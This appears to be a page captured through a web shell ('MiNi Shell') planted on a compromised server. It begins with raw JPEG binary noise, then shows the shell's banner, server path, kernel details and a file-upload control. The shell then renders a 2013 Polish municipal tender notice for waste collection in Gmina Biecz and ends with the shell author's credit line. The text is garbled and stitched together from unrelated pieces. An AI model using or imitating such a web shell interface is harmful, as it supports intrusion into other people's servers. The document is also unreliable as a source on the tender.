JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130417/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130417/151434-N-2013.html

<p class="kh_header"><b>Biecz: ODBIERANIE, TRANSPORT ORAZ ZAGOSPODAROWANIE ODPADÓW KOMUNALNYCH ZMIESZANYCH I SEGREGOWANYCH OD WŁAŚCICIELI NIERUCHOMOŚCI ZAMIESZKAŁYCH NA TERENIE GMINY BIECZ</b><br>
<b>Numer ogłoszenia: 151434 - 2013; data zamieszczenia: 17.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Biecz , Rynek 1, 38-340 Biecz, woj. małopolskie, tel. 013 4471113, faks 013 4471113.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.biecz.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ODBIERANIE, TRANSPORT ORAZ ZAGOSPODAROWANIE ODPADÓW KOMUNALNYCH ZMIESZANYCH I SEGREGOWANYCH OD WŁAŚCICIELI NIERUCHOMOŚCI ZAMIESZKAŁYCH NA TERENIE GMINY BIECZ.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia jest usługa polegająca na odbieraniu, transporcie  i zagospodarowaniu odpadów komunalnych zmieszanych i segregowanych od właścicieli nieruchomości zamieszkałych na terenie gminy Biecz. 
Gmina Biecz obejmuje:
a)miasto Biecz 
b)10 sołectw : Binarowa,  Racławice, Rożnowice, Bugaj, Sitnica, Strzeszyn, Libusza, Korczyna, Grudna  Kępska,
Głęboka                                                                                                     
Łączna liczba mieszkańców Gminy Biecz (stan na 31 grudnia 2012 roku.): 17 406   
Szacunkowa liczba gospodarstw domowych: ok. 4 000

Wykonawca zobowiązany jest do przestrzegania obowiązujących w trakcie umowy przepisów prawnych, a w szczególności:
a)ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2013 r. poz. 21),
b)ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz. U. z  2012 r. poz. 391 z poźn. zm.),
c)rozporządzenia Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz. U. z 2013 r. poz. 122),
d)uchwały nr XXIX/376/2013 Rady Miejskiej w Bieczu z dnia 28 marca 2013 r. w sprawie Regulaminu utrzymania czystości i porządku na terenie Gminy Biecz (zał. nr  1 do SIWZ),
e)uchwały nr XXIX/380/2013 Rady Miejskiej w Bieczu z dnia 28 marca 2013 r. w sprawie określenia szczegółowego sposobu i zakresu świadczenia usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości, na których zamieszkują mieszkańcy i zagospodarowania tych odpadów, w zamian za uiszczoną przez właściciela nieruchomości opłatę za gospodarowanie odpadami komunalnymi (zał. nr 2 do SIWZ),
f)uchwały nr XXV/398/12 Sejmiku Województwa Małopolskiego z dnia 2 lipca 2012 r. w sprawie wykonania Planu Gospodarki Odpadami Województwa Małopolskiego.
2.  Odbiorem zostaną objęte: 
- odpady komunalne zbierane w sposób nieselektywny, zmieszane niesegregowane odpady komunalne o kodzie 20 03 01,
- odpady komunalne zbierane w sposób selektywny u źródła z podziałem na frakcje: papier i tektura, szkło, metal, tworzywa sztuczne i opakowania wielomateriałowe oraz odpady  biodegradowalne w  tym  opakowania ulęgające biodegradacji,
- odpady wielkogabarytowe, które ze względu na swój rozmiar nie mogą być zbierane w typowych   pojemnikach i/lub workach na odpady, np. stare meble,
-   odpady elektryczne i elektroniczne, np. lodówki, pralki, telewizory itp.,
-   zużyte opony.
3.  Szacunkowe ilość odpadów do odebrania, przetransportowania i zagospodarowania z terenu gminy Biecz w okresie realizacji niniejszego przedmiotu zamówienia stanowiąca podstawę do opracowania formularza cenowego przedstawia się następująco:
a) odpady komunalne zbierane w sposób selektywny u źródła z podziałem na frakcje: papier i tektura, tworzywa sztuczne,  szkło,  metal, opakowania wielomateriałowe - ok. 270 Mg
b) odpady komunalne zbierane w sposób nieselektywny (zmieszane odpady  komunalne) - ok. 1080 Mg
c) odpady wielkogabarytowe, sprzęt elektryczny i elektroniczny oraz zużyte opony odbierane raz w okresie obowiązywania niniejszego zamówienia - ok. 3 Mg
UWAGA - Podane ilości stanowią wielkość orientacyjną. Faktyczne ilości odpadów mogą nie pokrywać się z podanymi przez Zamawiającego. Zamawiający zastrzega sobie prawo przekazania mniejszej lub większej ilości odpadów.
4. Wykonawca zobowiązuje się do odbierania następujących rodzajów odpadów komunalnych z pojemników lub worków o podwyższonej wytrzymałości,  w niżej wymienionych kolorach:
a)odpady komunalne zbierane w sposób nieselektywny (zmieszane niesegregowane odpady komunalne) - kolor czarny,
b)papier i tektura oraz opakowania wielomateriałowe - kolor niebieski,
c)tworzywa sztuczne - kolor żółty,
d)szkło - kolor zielony,
e)metal - kolor biały,
f)odpady zielone - kolor brązowy,
g)odpady wielkogabarytowe, które ze względu na swój rozmiar nie mogą być zbierane w typowych pojemnikach i/lub workach na odpady, odpady elektryczne i elektroniczne, zużyte opony.
5. Odbiór odpadów segregowanych i niesegregowanych w pojemnikach lub w workach o podwyższonej wytrzymałości przeznaczonych do zbierania odpadów komunalnych odbywać się będzie z następującą częstotliwością :
a) odbiór odpadów komunalnych zmieszanych raz na dwa tygodnie na obszarach wiejskich i miejskich oraz dwa razy w tygodniu w miejskiej ścisłej zabudowie mieszkaniowej (tzn. wzdłuż ulic: Rynek, Piekarska, Kromera, W. Pola, Potockiego, Ariańska, Grodzka, Fuska, Węgierska - do skrzyżowania z ul. Bochniewicza, ul. Parkowa) według tras objazdów opisanych w harmonogramie  stanowiącym            (zał. nr 3 do SIWZ),             
w dni robocze, od poniedziałku do piątku w godzinach 7:00 - 17:00. 
b) odbiór odpadów komunalnych zbieranych przez mieszkańców w sposób selektywny raz na cztery tygodnie na obszarach wiejskich i miejskich  oraz raz na dwa tygodnie w miejskiej ścisłej zabudowie mieszkaniowej (tzn. wzdłuż ulic: Rynek, Piekarska, Kromera, W.Pola, Potockiego, Ariańska, Grodzka, Fuska, Węgierska - do skrzyżowania z ul. Bochniewicza, ul. Parkowa) według tras objazdów opisanych w harmonogramie  stanowiącym (zał. nr 3 do SIWZ),  
w dni robocze, od poniedziałku do piątku w godzinach 7:00 - 17:00. 
6.  Odpady wielkogabarytowe, opony, zużyty sprzęt elektryczny i elektroniczny wystawione przez mieszkańców na trasie odbioru odpadów, odbierane będą raz w okresie obowiązywania niniejszego zamówienia, w terminie uzgodnionym wcześniej z Zamawiającym. 
Uwaga!
Przed przygotowaniem oferty zaleca się zapoznanie z trasami objazdów samochodów do zbierania odpadów komunalnych.
7. Do obowiązków wykonawcy należy odbieranie odpadów komunalnych od wszystkich właścicieli nieruchomości zamieszkałych położonych na terenie gminy Biecz oraz: 
a) przekazywanie odebranych od właścicieli nieruchomości selektywnie zebranych odpadów komunalnych do instalacji odzysku lub unieszkodliwiania odpadów, zgodnie z hierarchią postępowania z odpadami, o której mowa w art. 17 ustawy z dnia 14 grudnia 2012 roku o odpadach ( Dz. U. 2013 r., poz. 21)
b) przekazywanie odebranych od właścicieli nieruchomości zmieszanych odpadów komunalnych, odpadów zielonych oraz pozostałości z sortowania odpadów komunalnych do regionalnej instalacji do przetwarzania odpadów komunalnych lub, w szczególnych przypadkach przewidzianych obowiązującymi przepisami prawa, do instalacji przewidzianych do zastępczej obsługi regionu, wskazanych  w uchwale nr XXV/398/12 Sejmiku Województwa Małopolskiego z dnia 2 lipca 2012 r. w sprawie wykonania Planu Gospodarki Odpadami Województwa Małopolskiego.
8. Ponadto Wykonawca zobowiązany jest do:
a)    posiadania w swoim wyposażeniu wszystkich rodzajów opisanych, w uchwale nr XXIX/376/2013 z dnia 28 marca 2013 r. w sprawie Regulaminu utrzymania czystości i porządku na terenie Gminy Biecz, worków w celu ich sprzedaży. 
b)  zorganizowanie punktów dystrybucji worków na terenie gminy Biecz (co najmniej jeden punkt na terenie miasta i po jednym punkcie w każdym sołectwie zapewniających stałą możliwość zakupów worków),
c)  dysponowania legalizowaną wagą przejazdową. Zamawiający zastrzega sobie prawo do kontrolnego ważenia odpadów komunalnych,
d)  odbierania od właścicieli nieruchomości pojemników oraz worków posiadających umieszczone przez właścicieli nieruchomości numery identyfikacyjne. Numer indentyfikacyjny dla danej nieruchomości nadaje Urząd Miejski w Bieczu po otrzymaniu deklaracji. Zamawiający wyposaży Wykonawcę                     w urządzenia służące do odczytu danych identyfikacyjnych, w ilości 1 szt. Wykonawca zakupi we własnym zakresie urządzenia do odczytu w przypadku konieczności posiadania większej ich ilości.
e) porządkowania terenu w miejscu gromadzenia odpadów oraz porządkowania tras przejazdu
w przypadku zanieczyszczenia przez Wykonawcę lub w przypadku zanieczyszczenia wynikającego z przepełnienia pojemnika spowodowanego nie opróżnieniem go we właściwym czasie,
f)uzyskiwanie kart przekazania poszczególnych rodzajów odpadów,
g)przekazywania Zamawiającemu następujących dokumentów za dany miesiąc rozliczeniowy:
-  pisemnego raportu, który ma zawierać: ilości odebranych odpadów zmieszanych [Mg], ilości odebranych odpadów segregowanych z podziałem na frakcje: papier i tektura oraz opakowania wielomateriałowe, tworzywa sztuczne, szkło, metal, odpady zielone [Mg], ilości odebranych odpadów wielkogabarytowych, zużytego sprzętu elektrycznego i elektronicznego oraz zużytych opon [Mg], sposób zagospodarowania w/w odpadów,
- raporty wagowe poszczególnych frakcji odpadów,
- dowodów przyjęcia poszczególnych rodzajów odebranych odpadów komunalnych przez uprawnionego przedsiębiorcę wykonującego działalność w zakresie odzysku lub unieszkodliwiania odpadów (kart przekazania odpadów sporządzonych zgodnie z obowiązującymi przepisami),
h)dostarczania Zamawiającemu sprawozdań  z ilości odebranych i poddanych unieszkodliwieniu odpadów zgodnie z ustawą o utrzymaniu  czystości i porządku w gminach (Dz. U. z 2012 poz. 391 z późn. zm.) oraz Rozporządzenia Ministra Środowiska z dnia 15 maja 2012 r.  w sprawie wzorów sprawozdań              o odebranych odpadach komunalnych, odebranych nieczystościach ciekłych oraz realizacji zadań                  z zakresu gospodarowania odpadami komunalnymi ( Dz. U. z 2012,  poz. 630). Sprawozdanie to ma być składane do końca miesiąca po upływie kwartału którego dotyczy.
9. Za zawinione szkody (uszkodzenie techniczne pojemników przeznaczonych do zbierania odpadów zmieszanych i segregowanych) w majątku osób trzecich oraz Zamawiającego w trakcie odbioru odpadów odpowiedzialność ponosi Wykonawca.
10. System odbierania odpadów komunalnych nie obejmuje odpadów powstających na nieruchomościach niezamieszkałych (zakłady produkcyjne, placówki oświatowe, sklepy, banki, działki letniskowe itp.) oraz odpadów ulicznych, z targowisk.
11. Wykonawca pod żadnym pozorem nie może w trakcie odbioru i transportu mieszać odpadów gromadzonych selektywnie z odpadami gromadzonymi w sposób nieselektywny.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Każda składana oferta musi być zabezpieczona wadium w wysokości:  10 000,00 zł - słownie: dziesięć tysięcy złotych.
    Wadium może być wnoszone w następujących formach:
-pieniądzu (wyłącznie przelewem na rachunek bankowy zamawiającego),
-poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym     że poręczenie kasy jest zawsze poręczeniem pieniężnym,
-gwarancjach bankowych,
-gwarancjach ubezpieczeniowych,
-poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada  2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.
2. Wadium wnoszone w formie pieniądza należy wpłacić na konto zmawiającego: Gmina Biecz ul. Rynek 1 38-340 Biecz, BS Biecz  Nr 16 8627 0001 2002 3000 0954 0002.
3. Wadium wnoszone w innej formie niż w pieniądzu należy przekazać zamawiającemu w osobnej kopercie  - pok. nr 2 - kasa zamawiającego.
4. Termin wniesienia wadium w każdej formie:  do dnia 25.04.2013 r. do godz. 1130.
5. W przypadku wniesienia wadium w formie pieniądza za termin wniesienia wadium przyjmuje się datę uznania  na rachunku zamawiającego !
6. Zamawiający zwróci niezwłocznie wadium według zasad określonych w art. 46 ustawy Prawo zamówień publicznych. 
7. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana: 
a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie; 
b) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
8. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, 
o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania powyższego warunku należy przedstawić: 
- wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości, zgodnie z wymogami ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz. U. z 2012 r. poz. 391),
- aktualne zezwolenie na transport odpadów komunalnych, zgodnie z wymogami ustawy z dnia 27 kwietnia 2001 r. o odpadach (Dz. U. z 2010 r. Nr 185, poz. 1243 z późn. zm.).
Na podstawie złożonych dokumentów Zamawiający dokona oceny spełnienia wymaganego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie formułuje wymagań w zakresie ww. warunku.
Zamawiający dokona oceny spełniania warunku na podstawie oświadczenia Wykonawcy - zał. nr 5 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania powyższego warunku należy wykazać dysponowanie sprzętem specjalistycznym służącym do realizacji zamówienia w ilości co najmniej:
-    2 samochody  śmieciarki (w tym jedna mała o pojemności skrzyni załadunkowej wynoszącej 6-11 m3), 
-    1 samochód bramowiec, 
-    1 samochód skrzyniowy, 
-    1 samochód przystosowany do odbioru pojemników typu DZWON,
umożliwiającym wykonawcy odbiór odpadów gromadzonych w typach pojemników określonych w niniejszej SIWZ.
Na podstawie złożonych dokumentów Zamawiający dokona oceny spełnienia wymaganego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie formułuje wymagań w zakresie ww. warunku.
Zamawiający dokona oceny spełniania warunku na podstawie oświadczenia Wykonawcy - zał. nr 5 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie formułuje wymagań w zakresie ww. warunku.
Zamawiający dokona oceny spełniania warunku na podstawie oświadczenia Wykonawcy - zał. nr 5 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta na formularzu ofertowym o treści zgodnej z określoną we wzorze stanowiącym (zał. nr 4 do SIWZ). Formularz musi być podpisany przez osobę/osoby uprawnione do składania oświadczeń woli w zakresie praw i obowiązków majątkowych wykonawcy z podaniem ceny za całość przedmiotu zamówienia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przetargi.biecz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Bieczu
38-340 Biecz ul. Rynek 20, pok. nr 3.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.04.2013 godzina 11:30, miejsce: Urząd Miejski w Bieczu
38-340 Biecz ul. Rynek 1, pok. nr 2 - kancelaria urzędu.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Przed wszczęciem postępowania o udzielenie zamówienia nie przeprowadzono dialogu  technicznego.
2. Nie przewiduje  się udzielania  zamówień uzupełniających.
3. Nie przewiduje się udzielenie zaliczek na poczet wykonania zamówienia.
4. Nie ogranicza się możliwości ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50% pracowników stanowią osoby niepełnosprawne
5. Nie przeprowadzona będzie aukcja elektroniczna.
6. Informacja o zamiarze zawarcia umowy ramowej - nie dotyczy.
7. Informacja o zamiarze ustanowienia dynamicznego systemu zakupów  - nie dotyczy.
8.  Nie  przewiduje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com